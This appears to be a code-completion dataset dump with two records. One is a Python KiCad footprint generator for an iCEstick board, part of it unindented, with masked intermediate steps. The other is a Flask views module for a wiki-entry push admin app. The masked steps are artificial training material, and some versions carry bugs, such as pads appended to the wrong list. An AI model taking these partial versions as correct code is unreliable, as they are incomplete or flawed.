at = (x, y),
size = (padWidth, padWidth),
drill = drillDiameter
)
pads_j2 += [newPad]
y -= 2.54
# Second (inner) row of pins of J2
x -= 2.54
y = newY
for i in range(6):
# Create pad object
newPad = Pad(
designator = designators_j2[1][i],
through_hole = True,
plated = True,
shape = Shape.CIRCLE,
at = (x, y),
size = (padWidth, padWidth),
drill = drillDiameter
)
pads_j2 += [newPad]
y -= 2.54
#
# J3 connector pad list
#
pads_j3 = []
x = oldX
y = oldY
for i in range(10):
# The first pad is a rectangle, the remaining ones are circular
if (i == 0):
shape = Shape.RECT
else:
shape = Shape.CIRCLE
# Create pad object
newPad = Pad(
designator = designators_j3[i],
through_hole = True,
plated = True,
shape = shape,
at = (x, y),
size = (padWidth, padWidth),
drill = drillDiameter
)
    pads_j3 += [newPad]
x -= 2.54
# Make a list of all pads
pads = pads_j1 + pads_j2 + pads_j3
# Compose new footprint from header, pads and footer
newFootprint = header
for pad in pads:
newFootprint += str(pad) + "\n"
newFootprint += footer.strip()
# Print generated footprint to screen
print(newFootprint)
# Save generated footprint to file
f = open(filename, "w")
f.write(newFootprint)
f.close()
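
# ---------------------------------------------------------------------------
# Hedged sketch, not part of the original script: the `pad` module imported
# above is not included in this dump. Below is a minimal, assumed `Shape` and
# `Pad` implementation consistent with how the script uses them (keyword
# construction, str() yielding a KiCad pad s-expression); the real module may
# differ in details.
# ---------------------------------------------------------------------------
from enum import Enum

class Shape(Enum):
    CIRCLE = "circle"
    RECT = "rect"

class Pad:
    def __init__(self, designator, through_hole, plated, shape, at, size, drill):
        self.designator = designator
        self.through_hole = through_hole  # assumed True for this footprint
        self.plated = plated
        self.shape = shape
        self.at = at
        self.size = size
        self.drill = drill

    def __str__(self):
        # Emit one KiCad pad expression, e.g.:
        # (pad GND thru_hole circle (at 0 0) (size 1.6 1.6) (drill 1.0) (layers *.Cu *.Mask))
        hole = "thru_hole" if self.plated else "np_thru_hole"
        return "  (pad {} {} {} (at {} {}) (size {} {}) (drill {}) (layers *.Cu *.Mask))".format(
            self.designator, hole, self.shape.value,
            self.at[0], self.at[1], self.size[0], self.size[1], self.drill)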
|
flexible
|
{
"blob_id": "c71e367ad320d7eadabbbfda728d94448db6441d",
"index": 2109,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif exists(filename):\n f = open(filename)\n footprint = f.read()\n f.close()\n headerEndIndex = footprint.find('(pad ')\n header = footprint[:headerEndIndex]\n lastPadIndex = headerEndIndex\n while footprint.find('(pad ', lastPadIndex) > -1:\n lastPadIndex = footprint.find('(pad ', lastPadIndex) + 5\n footerStartIndex = footprint.find('))', lastPadIndex) + 2\n footer = footprint[footerStartIndex:]\nif header.find('TE-Connectivity') < 0:\n header = \"\"\"(module iCEstick (layer F.Cu) (tedit 5BD73D6F)\n (fp_text reference REF** (at 0 -12.7) (layer F.SilkS)\n (effects (font (size 1 1) (thickness 0.15)))\n )\n (fp_text value iCEstick (at 0 25.4) (layer F.Fab)\n (effects (font (size 1 1) (thickness 0.15)))\n )\n\"\"\"\n footer = ')'\n<mask token>\ny -= 21.81\nfor i in range(10):\n if i == 0:\n shape = Shape.RECT\n else:\n shape = Shape.CIRCLE\n newPad = Pad(designator=designators_j1[i], through_hole=True, plated=\n True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=\n drillDiameter)\n pads_j1 += [newPad]\n x -= 2.54\n<mask token>\nfor i in range(6):\n if i == 0:\n shape = Shape.RECT\n else:\n shape = Shape.CIRCLE\n newPad = Pad(designator=designators_j2[0][i], through_hole=True, plated\n =True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=\n drillDiameter)\n pads_j2 += [newPad]\n y -= 2.54\nx -= 2.54\n<mask token>\nfor i in range(6):\n newPad = Pad(designator=designators_j2[1][i], through_hole=True, plated\n =True, shape=Shape.CIRCLE, at=(x, y), size=(padWidth, padWidth),\n drill=drillDiameter)\n pads_j2 += [newPad]\n y -= 2.54\n<mask token>\nfor i in range(10):\n if i == 0:\n shape = Shape.RECT\n else:\n shape = Shape.CIRCLE\n newPad = Pad(designator=designators_j3[i], through_hole=True, plated=\n True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=\n drillDiameter)\n pads_j1 += [newPad]\n x -= 2.54\n<mask token>\nfor pad in pads:\n newFootprint += str(pad) + '\\n'\nnewFootprint += footer.strip()\nprint(newFootprint)\n<mask token>\nf.write(newFootprint)\nf.close()\n",
"step-3": "x = 0.0\ny = 0.0\ndrillDiameter = 1.0\npadWidth = 1.6\n<mask token>\nfilename = 'iCEstick.kicad_mod'\nheader = ''\nfooter = ''\nif exists(filename):\n f = open(filename)\n footprint = f.read()\n f.close()\n headerEndIndex = footprint.find('(pad ')\n header = footprint[:headerEndIndex]\n lastPadIndex = headerEndIndex\n while footprint.find('(pad ', lastPadIndex) > -1:\n lastPadIndex = footprint.find('(pad ', lastPadIndex) + 5\n footerStartIndex = footprint.find('))', lastPadIndex) + 2\n footer = footprint[footerStartIndex:]\nif header.find('TE-Connectivity') < 0:\n header = \"\"\"(module iCEstick (layer F.Cu) (tedit 5BD73D6F)\n (fp_text reference REF** (at 0 -12.7) (layer F.SilkS)\n (effects (font (size 1 1) (thickness 0.15)))\n )\n (fp_text value iCEstick (at 0 25.4) (layer F.Fab)\n (effects (font (size 1 1) (thickness 0.15)))\n )\n\"\"\"\n footer = ')'\ndesignators_j1 = ['3V3', 'GND'] + [str(n) for n in range(112, 120)]\ndesignators_j2 = [[str(n) for n in range(78, 82)] + ['GND', '3V3'], ['87',\n '88', '90', '91', 'GND', '3V3']]\ndesignators_j3 = ['3V3', 'GND', '62', '61', '60', '56', '48', '47', '45', '44']\npads_j1 = []\noldX = x\noldY = y\ny -= 21.81\nfor i in range(10):\n if i == 0:\n shape = Shape.RECT\n else:\n shape = Shape.CIRCLE\n newPad = Pad(designator=designators_j1[i], through_hole=True, plated=\n True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=\n drillDiameter)\n pads_j1 += [newPad]\n x -= 2.54\npads_j2 = []\nx = oldX - 5.8\nnewY = oldY - 21.81 + 4.49 + 5 * 2.54\ny = newY\nfor i in range(6):\n if i == 0:\n shape = Shape.RECT\n else:\n shape = Shape.CIRCLE\n newPad = Pad(designator=designators_j2[0][i], through_hole=True, plated\n =True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=\n drillDiameter)\n pads_j2 += [newPad]\n y -= 2.54\nx -= 2.54\ny = newY\nfor i in range(6):\n newPad = Pad(designator=designators_j2[1][i], through_hole=True, plated\n =True, shape=Shape.CIRCLE, at=(x, y), size=(padWidth, padWidth),\n drill=drillDiameter)\n pads_j2 += [newPad]\n y -= 2.54\npads_j3 = []\nx = oldX\ny = oldY\nfor i in range(10):\n if i == 0:\n shape = Shape.RECT\n else:\n shape = Shape.CIRCLE\n newPad = Pad(designator=designators_j3[i], through_hole=True, plated=\n True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=\n drillDiameter)\n pads_j1 += [newPad]\n x -= 2.54\npads = pads_j1 + pads_j2 + pads_j3\nnewFootprint = header\nfor pad in pads:\n newFootprint += str(pad) + '\\n'\nnewFootprint += footer.strip()\nprint(newFootprint)\nf = open(filename, 'w')\nf.write(newFootprint)\nf.close()\n",
"step-4": "x = 0.0\ny = 0.0\ndrillDiameter = 1.0\npadWidth = 1.6\nfrom os.path import exists\nfrom pad import *\nfilename = 'iCEstick.kicad_mod'\nheader = ''\nfooter = ''\nif exists(filename):\n f = open(filename)\n footprint = f.read()\n f.close()\n headerEndIndex = footprint.find('(pad ')\n header = footprint[:headerEndIndex]\n lastPadIndex = headerEndIndex\n while footprint.find('(pad ', lastPadIndex) > -1:\n lastPadIndex = footprint.find('(pad ', lastPadIndex) + 5\n footerStartIndex = footprint.find('))', lastPadIndex) + 2\n footer = footprint[footerStartIndex:]\nif header.find('TE-Connectivity') < 0:\n header = \"\"\"(module iCEstick (layer F.Cu) (tedit 5BD73D6F)\n (fp_text reference REF** (at 0 -12.7) (layer F.SilkS)\n (effects (font (size 1 1) (thickness 0.15)))\n )\n (fp_text value iCEstick (at 0 25.4) (layer F.Fab)\n (effects (font (size 1 1) (thickness 0.15)))\n )\n\"\"\"\n footer = ')'\ndesignators_j1 = ['3V3', 'GND'] + [str(n) for n in range(112, 120)]\ndesignators_j2 = [[str(n) for n in range(78, 82)] + ['GND', '3V3'], ['87',\n '88', '90', '91', 'GND', '3V3']]\ndesignators_j3 = ['3V3', 'GND', '62', '61', '60', '56', '48', '47', '45', '44']\npads_j1 = []\noldX = x\noldY = y\ny -= 21.81\nfor i in range(10):\n if i == 0:\n shape = Shape.RECT\n else:\n shape = Shape.CIRCLE\n newPad = Pad(designator=designators_j1[i], through_hole=True, plated=\n True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=\n drillDiameter)\n pads_j1 += [newPad]\n x -= 2.54\npads_j2 = []\nx = oldX - 5.8\nnewY = oldY - 21.81 + 4.49 + 5 * 2.54\ny = newY\nfor i in range(6):\n if i == 0:\n shape = Shape.RECT\n else:\n shape = Shape.CIRCLE\n newPad = Pad(designator=designators_j2[0][i], through_hole=True, plated\n =True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=\n drillDiameter)\n pads_j2 += [newPad]\n y -= 2.54\nx -= 2.54\ny = newY\nfor i in range(6):\n newPad = Pad(designator=designators_j2[1][i], through_hole=True, plated\n =True, shape=Shape.CIRCLE, at=(x, y), size=(padWidth, padWidth),\n drill=drillDiameter)\n pads_j2 += [newPad]\n y -= 2.54\npads_j3 = []\nx = oldX\ny = oldY\nfor i in range(10):\n if i == 0:\n shape = Shape.RECT\n else:\n shape = Shape.CIRCLE\n newPad = Pad(designator=designators_j3[i], through_hole=True, plated=\n True, shape=shape, at=(x, y), size=(padWidth, padWidth), drill=\n drillDiameter)\n pads_j1 += [newPad]\n x -= 2.54\npads = pads_j1 + pads_j2 + pads_j3\nnewFootprint = header\nfor pad in pads:\n newFootprint += str(pad) + '\\n'\nnewFootprint += footer.strip()\nprint(newFootprint)\nf = open(filename, 'w')\nf.write(newFootprint)\nf.close()\n",
"step-5": "#!/usr/bin/python\n\n# Point of origin (connector J3, pad 1, net 3V3)\nx = 0.0\ny = 0.0\n\ndrillDiameter = 1.0\npadWidth = 1.6\n\n\nfrom os.path import exists\nfrom pad import *\n\nfilename=\"iCEstick.kicad_mod\"\n\nheader = \"\"\nfooter = \"\"\n\nif exists(filename):\n # Read existing footprint\n f = open(filename)\n footprint = f.read()\n f.close()\n \n # Find the end of the header\n headerEndIndex = footprint.find(\"(pad \")\n header = footprint[:headerEndIndex]\n \n # Find the end of the pads list\n lastPadIndex = headerEndIndex\n while (footprint.find(\"(pad \", lastPadIndex) > -1):\n lastPadIndex = footprint.find(\"(pad \", lastPadIndex) + 5\n \n footerStartIndex = footprint.find(\"))\", lastPadIndex) + 2\n footer = footprint[footerStartIndex:]\n\nif header.find(\"TE-Connectivity\") < 0:\n header = \\\n\"\"\"(module iCEstick (layer F.Cu) (tedit 5BD73D6F)\n (fp_text reference REF** (at 0 -12.7) (layer F.SilkS)\n (effects (font (size 1 1) (thickness 0.15)))\n )\n (fp_text value iCEstick (at 0 25.4) (layer F.Fab)\n (effects (font (size 1 1) (thickness 0.15)))\n )\n\"\"\"\n footer = \")\"\n\n#\n# Generate pads according to schematic drawing\n#\n\ndesignators_j1 = [\"3V3\", \"GND\"] + [str(n) for n in range(112,120)]\n\ndesignators_j2 = [ \\\n [str(n) for n in range(78,82)] + [\"GND\", \"3V3\"], \\\n [\"87\", \"88\", \"90\", \"91\", \"GND\", \"3V3\"] \\\n ]\n\ndesignators_j3 = [\"3V3\", \"GND\", \"62\", \"61\", \"60\", \"56\", \"48\", \"47\", \"45\", \"44\"]\n\n#\n# J1 connector pad list\n#\npads_j1 = []\noldX = x\noldY = y\ny -= 21.81\nfor i in range(10):\n # The first pad is a rectangle, the remaining ones are circular\n if (i == 0):\n shape = Shape.RECT\n else:\n shape = Shape.CIRCLE\n \n # Create pad object\n newPad = Pad(\n designator = designators_j1[i],\n through_hole = True,\n plated = True,\n shape = shape,\n at = (x, y),\n size = (padWidth, padWidth),\n drill = drillDiameter\n )\n pads_j1 += [newPad]\n x -= 2.54\n\n#\n# J2 connector pad list\n#\npads_j2 = []\nx = oldX - 5.80\nnewY = oldY - 21.81 + 4.49 + 5*2.54\ny = newY\nfor i in range(6):\n # The first pad is a rectangle, the remaining ones are circular\n if (i == 0):\n shape = Shape.RECT\n else:\n shape = Shape.CIRCLE\n \n # Create pad object\n newPad = Pad(\n designator = designators_j2[0][i],\n through_hole = True,\n plated = True,\n shape = shape,\n at = (x, y),\n size = (padWidth, padWidth),\n drill = drillDiameter\n )\n pads_j2 += [newPad]\n y -= 2.54\n\n# Second (inner) row of pins of J2\nx -= 2.54\ny = newY\nfor i in range(6):\n # Create pad object\n newPad = Pad(\n designator = designators_j2[1][i],\n through_hole = True,\n plated = True,\n shape = Shape.CIRCLE,\n at = (x, y),\n size = (padWidth, padWidth),\n drill = drillDiameter\n )\n pads_j2 += [newPad]\n y -= 2.54\n\n#\n# J3 connector pad list\n#\npads_j3 = []\nx = oldX\ny = oldY\nfor i in range(10):\n # The first pad is a rectangle, the remaining ones are circular\n if (i == 0):\n shape = Shape.RECT\n else:\n shape = Shape.CIRCLE\n \n # Create pad object\n newPad = Pad(\n designator = designators_j3[i],\n through_hole = True,\n plated = True,\n shape = shape,\n at = (x, y),\n size = (padWidth, padWidth),\n drill = drillDiameter\n )\n pads_j1 += [newPad]\n x -= 2.54\n\n# Make a list of all pads\npads = pads_j1 + pads_j2 + pads_j3\n\n# Compose new footprint from header, pads and footer\nnewFootprint = header\nfor pad in pads:\n newFootprint += str(pad) + \"\\n\"\nnewFootprint += footer.strip()\n\n# Print generated footprint to 
screen\nprint(newFootprint)\n\n# Save generated footprint to file\nf = open(filename, \"w\")\nf.write(newFootprint)\nf.close()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
import urllib
from urllib2 import HTTPError
from datetime import datetime
from flask.views import MethodView
from flask.ext.login import current_user, login_required
from flask.ext.paginate import Pagination as PaginationBar
from flask import render_template, redirect, url_for, request, jsonify, flash, current_app, abort
from koushihime.auth.models import UserOperation, User, Role
from koushihime.auth.constants import Permission, Operation
from koushihime.utils import Pagination, admin_required, Env
from koushihime.utils.moegirl import MoegirlQuery, MoegirlImage
from . import main
from utils import recent_have_pushed, have_auto_catched
from models import WaitingQueue, BanList, RulePushCount
from forms import PushForm, AddUserForm, EditProfileForm, AdminEditProfileForm, BanKeywordForm, CookieForm
@main.before_request
def before_request():
if current_user.is_anonymous:
return redirect(url_for('auth.login'))
elif current_user.is_blocked:
return render_template('main/auth/block.html')
else:
current_user.last_seen = datetime.utcnow()
current_user.save()
class Index(MethodView):
def get(self):
if not current_user:
return redirect(url_for("auth.login"))
config = current_app.config["WEIBO_AUTH_CONFIG"]
callback = urllib.quote(config["CALLBACK"])
app_key = config["APP_KEY"]
return render_template('main/index.html', callback=callback, app_key=app_key)
class Update(MethodView):
decorators = [login_required]
def get(self, page):
per_page = 10
unpushed_entry = WaitingQueue.query.order_by(WaitingQueue.cutting_weight.desc()).all()
pagination = Pagination(unpushed_entry, per_page)
current_page = pagination.page(page)
foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',
show_single_page=True, page=page,
per_page=per_page, total=len(unpushed_entry),
format_total=True, format_number=True)
result = {
"titles": current_page,
"current_time": datetime.utcnow(),
"pushtime": 10,
"deltime": 999,
"page": page,
"per_page": per_page,
"pagination": foot_bar
}
return render_template('main/update.html', **result)
def post(self, page):
data = request.get_json()
if data['action'] == 'post':
title = data["title"]
env = Env()
current_weight = env.get("CUTTING_WEIGHT_INIT")
entry = WaitingQueue.query.filter_by(title=title).first()
if entry:
                entry.cutting_weight = current_weight + 1  # FIXME: the weight can still be increased even when the entry is already at the highest weight
entry.save()
env.set("CUTTING_WEIGHT_INIT", entry.cutting_weight)
elif data['action'] == 'del':
title = data['title']
UserOperation(user_id=current_user.id, operation=Operation.DELETE, title=title).save()
query = WaitingQueue.query.filter_by(title=data['title']).first()
if query:
query.delete()
response = jsonify({'result': True})
return response
class ManualUpdate(MethodView):
decorators = [login_required]
def __init__(self):
self.form = PushForm
def get(self):
return render_template('main/mupdate.html', form=self.form(), pushtime=10)
def post(self):
        if not current_user.can(Permission.MANUAL_PUSH):
            flash(u"你没有权限")
            return redirect(url_for('main.mupdate'))

        form = self.form(request.form)
        if not form.validate():
            flash(u"条目格式有问题,请检查并重新填写")
            return redirect(url_for('main.mupdate'))

        title = form.pushtitle.data
        result = self.check_push_validate(title.encode("utf-8"))
        if not result:
            flash(u"推送条目被ban,或者已经在24小时之内推送过,或者已经进入待推送列表")
            return redirect(url_for('main.mupdate'))

        try:
            image = MoegirlImage(title)
        except HTTPError as e:
            flash(u"请求萌百错误,错误码如下{},请联系管理员".format(e))
            return redirect(url_for('main.mupdate'))
        if not image.path:
            flash(u"无法取得图片,请重试")
            return redirect(url_for('main.mupdate'))
entry = WaitingQueue(title=title, image=image.path)
env = Env()
current_weight = env.get("CUTTING_WEIGHT_INIT")
entry.cutting_weight = current_weight + 1
entry.save()
env.set("CUTTING_WEIGHT_INIT", entry.cutting_weight)
UserOperation(user_id=current_user.id, title=title, operation=Operation.PUSH).save()
if form.industry.data:
try:
from koushihime.crontab import push
push()
except Exception as e:
flash(u"推送失败: {}".format(str(e)))
flash(u"操作成功,词条将立即推送")
return redirect(url_for('main.mupdate'))
@staticmethod
def check_push_validate(title):
moegirl_entry = MoegirlQuery(title)
namespace = moegirl_entry.get_namespace()
        if namespace == 0:
baned_from_moegirl = moegirl_entry.banned_moegirl_category()
baned_from_regex = moegirl_entry.ban_from_regex()
            has_pushed = recent_have_pushed(title.decode("utf-8"))  # TODO: switch to automatic bubbling
has_catched = have_auto_catched(title.decode("utf-8"))
result = baned_from_moegirl is False \
and has_pushed is False \
and has_catched is False \
and baned_from_regex is False
return result
else:
return False
class UserInfo(MethodView):
decorators = [login_required]
def get(self, username):
is_admin = current_user.can(Permission.ADMINISTER)
if current_user.username == username or is_admin is True:
user_info = User.query.filter_by(username=username, deleted=False).first()
if not user_info:
abort(404)
return render_template('main/user.html', u=user_info, username=user_info.username)
else:
abort(403)
class UserList(MethodView):
decorators = [login_required, admin_required]
def __init__(self):
self.form = AddUserForm
def get(self):
userlist = User.query.filter_by(deleted=False).all()
return render_template('main/userlist.html', userlist=userlist, form=self.form())
def post(self):
data = request.get_json()
if data:
if data['action'] == 'edit':
username = data['username']
else:
username = data['username']
try:
User.query.filter_by(username=username, deleted=False).first().delete()
except:
flash(u'用户不存在')
return jsonify({"status": 302, "location": url_for('main.editprofile', username=username)})
elif request.form:
self.add_user()
return redirect('userlist')
def add_user(self):
form = self.form(request.form)
if form.validate():
role = Role.query.filter_by(name=form.role.data).first()
if role:
if not User.query.filter_by(email=form.email.data).first():
user = User(email=form.email.data, username=form.username.data,
role=role, password=form.password.data)
user.save()
else:
flash(u'已经存在该用户')
else:
flash(u'不存在该用户组')
return redirect(url_for('main.userlist'))
class EditProfile(MethodView):
decorators = [login_required]
def __init__(self):
self.form = EditProfileForm
self.admin_form = AdminEditProfileForm
def get(self, username):
        if not username:  # the user is editing their own profile page
form = self.form()
form.email.data = current_user.email
form.about_me.data = current_user.aboutme
else:
if current_user.can(Permission.ADMINISTER):
user_info = User.query.filter_by(username=username, deleted=False).first()
if user_info:
form = self.admin_form()
form.email.data = user_info.email
form.about_me.data = user_info.aboutme
form.role.data = user_info.role.name
else:
flash(u'用户不存在')
return redirect(url_for('main.index'))
else:
abort(403)
return render_template('main/edit_profile.html', form=form, u=current_user)
def post(self, username):
if not username:
form = self.form(request.form)
user = current_user
else:
if current_user.can(Permission.ADMINISTER):
form = self.form(request.form)
user = User.query.filter_by(username=username, deleted=False).first()
if user:
if not current_user.verify_password(form.oripassword.data):
flash(u'管理员密码输入错误')
return redirect(url_for('main.editprofile', username=username))
else:
flash(u'用户不存在')
return redirect(url_for('main.index'))
else:
abort(403)
self.change_profile(user, form, True if username else False)
return redirect(url_for('main.user', username=username))
@staticmethod
def change_profile(user, form, admin=False):
user.password = form.password.data
user.email = form.email.data
user.aboutme = form.about_me.data
if admin:
            new_role = Role.query.filter_by(name=form.role.data).first()
if new_role:
user.role = new_role
user.save()
class OperationLog(MethodView):
decorators = [login_required, admin_required]
def get(self, page):
per_page = 10
count = UserOperation.query.count()
query = UserOperation.query.order_by(UserOperation.id.desc())\
.paginate(page=page, per_page=per_page, error_out=False)
foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',
show_single_page=False, page=page, per_page=per_page,
total=count, format_total=True, format_number=True)
return render_template('main/log.html', records=query.items,
page=page, per_page=per_page, pagination=foot_bar, Operation=Operation)
class KeywordBan(MethodView):
decorators = [login_required, admin_required]
def __init__(self):
self.form = BanKeywordForm
def get(self, page):
per_page = 10
count = BanList.query.filter_by(deleted=False).count()
        # TODO: load the keywords into the config to reduce the number of queries
pagination = BanList.query.filter_by(deleted=False)\
.paginate(page=page, per_page=per_page, error_out=False)
foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',
show_single_page=False, page=page, per_page=per_page,
total=count, format_total=True, format_number=True)
template_param = {
'keywords': pagination.items,
'page': page,
'per_page': per_page,
'pagination': foot_bar,
'form': self.form()
}
return render_template('main/ban.html', **template_param)
def post(self, page):
data = request.get_json()
if data:
keyword = data['keyword']
result = BanList.query.filter_by(rule=keyword).first()
if result:
if result.status:
result.status.delete()
result.delete()
flash(u'成功删除关键词')
else:
flash(u'该关键词不存在')
return jsonify({"status": 302, "location": url_for('main.ban')})
elif request.form:
form = self.form(request.form)
if form.validate():
exist = BanList.query.filter_by(rule=form.keyword.data).first()
if not exist:
ban = BanList(rule=form.keyword.data, time_limit=form.time_limit.data)
ban.save()
status = RulePushCount(rule_id=ban.id, count=ban.time_limit)
status.save()
flash(u'添加关键词成功')
else:
if exist.deleted is True:
exist.deleted = False
exist.time_limit = form.time_limit.data
exist.save()
status = RulePushCount(rule_id=exist.id, count=exist.time_limit)
status.save()
else:
flash(u'重复添加关键词')
return redirect(url_for('main.ban'))
# TODO: deprecated
class WeiboAuthCallback(MethodView):
decorators = [login_required, admin_required]
def get(self):
self.auth_code = request.args.get("code")
result = self.fresh_access()
if result is True:
return render_template('main/success.html')
else:
return render_template('main/failed.html', e=result)
def fresh_access(self):
# config = current_app.config["WEIBO_AUTH_CONFIG"]
# callback = config["CALLBACK"]
# app_key = config["APP_KEY"]
# app_secret_key = config["APP_SECRET"]
try:
pass
# client = APIClient(app_key=app_key, app_secret=app_secret_key, redirect_uri=callback)
# token_data = client.request_access_token(self.auth_code)
# access_token, expires_in = token_data.access_token, token_data.expires_in
except BaseException as e:
return e
# config["ACCESS_TOKEN"] = access_token
# config["EXPIRE_TIME"] = expires_in
# env = Env()
# env.set("ACCESS_TOKEN", access_token)
# env = Env()
# env.set("EXPIRE_TIME", expires_in)
return True
class Cookie(MethodView):
decorators = [login_required, admin_required]
def __init__(self):
self.form = CookieForm
def get(self):
return render_template('main/cookie.html', form=self.form(), pushtime=10)
def post(self):
form = self.form(request.form)
        if not form.validate():
            flash(u"表单不合法")
            return redirect(url_for('main.cookie'))
cookie = form.cookie.data
env = Env()
env.set("COOKIE", cookie)
flash(u"设置 Cookie 成功")
return redirect(url_for('main.cookie'))
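

# ---------------------------------------------------------------------------
# Hedged sketch, not shown in this file: these MethodView classes still need
# URL rules registered on the `main` blueprint. The endpoint names used in
# url_for() above ('main.index', 'main.mupdate', 'main.user', 'main.userlist',
# 'main.editprofile', 'main.ban', 'main.cookie', ...) suggest a registration
# roughly like the following; the actual paths in the project may differ.
# ---------------------------------------------------------------------------
main.add_url_rule('/', view_func=Index.as_view('index'))

update_view = Update.as_view('update')
main.add_url_rule('/update', defaults={'page': 1}, view_func=update_view)
main.add_url_rule('/update/<int:page>', view_func=update_view)

main.add_url_rule('/mupdate', view_func=ManualUpdate.as_view('mupdate'))
main.add_url_rule('/user/<username>', view_func=UserInfo.as_view('user'))
main.add_url_rule('/userlist', view_func=UserList.as_view('userlist'))

edit_view = EditProfile.as_view('editprofile')
main.add_url_rule('/edit-profile', defaults={'username': None}, view_func=edit_view)
main.add_url_rule('/edit-profile/<username>', view_func=edit_view)

log_view = OperationLog.as_view('log')
main.add_url_rule('/log', defaults={'page': 1}, view_func=log_view)
main.add_url_rule('/log/<int:page>', view_func=log_view)

ban_view = KeywordBan.as_view('ban')
main.add_url_rule('/ban', defaults={'page': 1}, view_func=ban_view)
main.add_url_rule('/ban/<int:page>', view_func=ban_view)

main.add_url_rule('/callback', view_func=WeiboAuthCallback.as_view('callback'))
main.add_url_rule('/cookie', view_func=Cookie.as_view('cookie'))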
|
normal
|
{
"blob_id": "1a561ca0268d084c8fdde5de65ce0c7e68154eec",
"index": 4993,
"step-1": "<mask token>\n\n\nclass OperationLog(MethodView):\n decorators = [login_required, admin_required]\n\n def get(self, page):\n per_page = 10\n count = UserOperation.query.count()\n query = UserOperation.query.order_by(UserOperation.id.desc()).paginate(\n page=page, per_page=per_page, error_out=False)\n foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',\n show_single_page=False, page=page, per_page=per_page, total=\n count, format_total=True, format_number=True)\n return render_template('main/log.html', records=query.items, page=\n page, per_page=per_page, pagination=foot_bar, Operation=Operation)\n\n\nclass KeywordBan(MethodView):\n decorators = [login_required, admin_required]\n\n def __init__(self):\n self.form = BanKeywordForm\n\n def get(self, page):\n per_page = 10\n count = BanList.query.filter_by(deleted=False).count()\n pagination = BanList.query.filter_by(deleted=False).paginate(page=\n page, per_page=per_page, error_out=False)\n foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',\n show_single_page=False, page=page, per_page=per_page, total=\n count, format_total=True, format_number=True)\n template_param = {'keywords': pagination.items, 'page': page,\n 'per_page': per_page, 'pagination': foot_bar, 'form': self.form()}\n return render_template('main/ban.html', **template_param)\n\n def post(self, page):\n data = request.get_json()\n if data:\n keyword = data['keyword']\n result = BanList.query.filter_by(rule=keyword).first()\n if result:\n if result.status:\n result.status.delete()\n result.delete()\n flash(u'成功删除关键词')\n else:\n flash(u'该关键词不存在')\n return jsonify({'status': 302, 'location': url_for('main.ban')})\n elif request.form:\n form = self.form(request.form)\n if form.validate():\n exist = BanList.query.filter_by(rule=form.keyword.data).first()\n if not exist:\n ban = BanList(rule=form.keyword.data, time_limit=form.\n time_limit.data)\n ban.save()\n status = RulePushCount(rule_id=ban.id, count=ban.time_limit\n )\n status.save()\n flash(u'添加关键词成功')\n elif exist.deleted is True:\n exist.deleted = False\n exist.time_limit = form.time_limit.data\n exist.save()\n status = RulePushCount(rule_id=exist.id, count=exist.\n time_limit)\n status.save()\n else:\n flash(u'重复添加关键词')\n return redirect(url_for('main.ban'))\n\n\nclass WeiboAuthCallback(MethodView):\n decorators = [login_required, admin_required]\n\n def get(self):\n self.auth_code = request.args.get('code')\n result = self.fresh_access()\n if result is True:\n return render_template('main/success.html')\n else:\n return render_template('main/failed.html', e=result)\n\n def fresh_access(self):\n try:\n pass\n except BaseException as e:\n return e\n return True\n\n\nclass Cookie(MethodView):\n decorators = [login_required, admin_required]\n\n def __init__(self):\n self.form = CookieForm\n\n def get(self):\n return render_template('main/cookie.html', form=self.form(),\n pushtime=10)\n\n def post(self):\n form = self.form(request.form)\n if not form.validate():\n flash(u'表单不合法')\n cookie = form.cookie.data\n env = Env()\n env.set('COOKIE', cookie)\n flash(u'设置 Cookie 成功')\n return redirect(url_for('main.cookie'))\n",
"step-2": "<mask token>\n\n\nclass UserList(MethodView):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass EditProfile(MethodView):\n decorators = [login_required]\n\n def __init__(self):\n self.form = EditProfileForm\n self.admin_form = AdminEditProfileForm\n\n def get(self, username):\n if not username:\n form = self.form()\n form.email.data = current_user.email\n form.about_me.data = current_user.aboutme\n elif current_user.can(Permission.ADMINISTER):\n user_info = User.query.filter_by(username=username, deleted=False\n ).first()\n if user_info:\n form = self.admin_form()\n form.email.data = user_info.email\n form.about_me.data = user_info.aboutme\n form.role.data = user_info.role.name\n else:\n flash(u'用户不存在')\n return redirect(url_for('main.index'))\n else:\n abort(403)\n return render_template('main/edit_profile.html', form=form, u=\n current_user)\n\n def post(self, username):\n if not username:\n form = self.form(request.form)\n user = current_user\n elif current_user.can(Permission.ADMINISTER):\n form = self.form(request.form)\n user = User.query.filter_by(username=username, deleted=False\n ).first()\n if user:\n if not current_user.verify_password(form.oripassword.data):\n flash(u'管理员密码输入错误')\n return redirect(url_for('main.editprofile', username=\n username))\n else:\n flash(u'用户不存在')\n return redirect(url_for('main.index'))\n else:\n abort(403)\n self.change_profile(user, form, True if username else False)\n return redirect(url_for('main.user', username=username))\n\n @staticmethod\n def change_profile(user, form, admin=False):\n user.password = form.password.data\n user.email = form.email.data\n user.aboutme = form.about_me.data\n if admin:\n new_role = Role.query.filter_by(name=form.role.data)\n if new_role:\n user.role = new_role\n user.save()\n\n\nclass OperationLog(MethodView):\n decorators = [login_required, admin_required]\n\n def get(self, page):\n per_page = 10\n count = UserOperation.query.count()\n query = UserOperation.query.order_by(UserOperation.id.desc()).paginate(\n page=page, per_page=per_page, error_out=False)\n foot_bar = PaginationBar(css_framework='bootstrap3', link_size='sm',\n show_single_page=False, page=page, per_page=per_page, total=\n count, format_total=True, format_number=True)\n return render_template('main/log.html', records=query.items, page=\n page, per_page=per_page, pagination=foot_bar, Operation=Operation)\n\n\nclass KeywordBan(MethodView):\n decorators = [login_required, admin_required]\n\n def __init__(self):\n self.form = 